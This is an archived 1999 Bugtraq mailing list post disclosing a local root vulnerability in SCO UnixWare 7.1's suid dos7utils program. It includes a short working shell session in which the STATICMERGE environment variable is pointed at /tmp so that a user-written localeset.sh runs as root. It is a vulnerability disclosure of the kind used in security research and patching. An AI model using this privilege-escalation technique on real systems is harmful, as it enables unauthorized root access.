[12138] in bugtraq
SCO UnixWare 7.1 local root exploit
daemon@ATHENA.MIT.EDU (Brock Tellier)
Wed Oct 6 14:15:35 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Message-Id: <19991005183049.1722.qmail@www0r.netaddress.usa.net>
Date: Tue, 5 Oct 1999 12:30:49 MDT
Reply-To: Brock Tellier <btellier@USA.NET>
From: Brock Tellier <btellier@USA.NET>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
Greetings,
A vulnerability exists in the /usr/lib/merge/dos7utils program (suid root by
default) which allows any user to execute any command as root. The dos7utils
program gets its localeset.sh exec path from the environment variable
STATICMERGE. By setting this to a directory writable by us and setting the -f
switch, we can have dos7utils run our program as follows:
bash-2.02$ uname -a; id; pwd
UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5
uid=101(xnec) gid=1(other)
/usr/lib/merge
bash-2.02$ export STATICMERGE=/tmp
bash-2.02$ cat > /tmp/localeset.sh
#!/bin/sh
id
bash-2.02$ chmod 700 /tmp/localeset.sh
bash-2.02$ ./dos7utils -f bah
uid=0(root) gid=1(other)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
bash-2.02$
----
Searching through the securityfocus vulnerability archives yields 0 matches
for search string "unixware", but several for "openserver". I thought this
was rather strange, considering that SCO is discontinuing OpenServer after
5.0.5 in favor of the much more reliable (though not security-wise, evidently)
UnixWare 7. And so begins my audit of the virgin Unixware 7 so soon after my
incomplete audit of SCO 5.0.5.
Brock Tellier
UNIX Systems Administrator
____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1
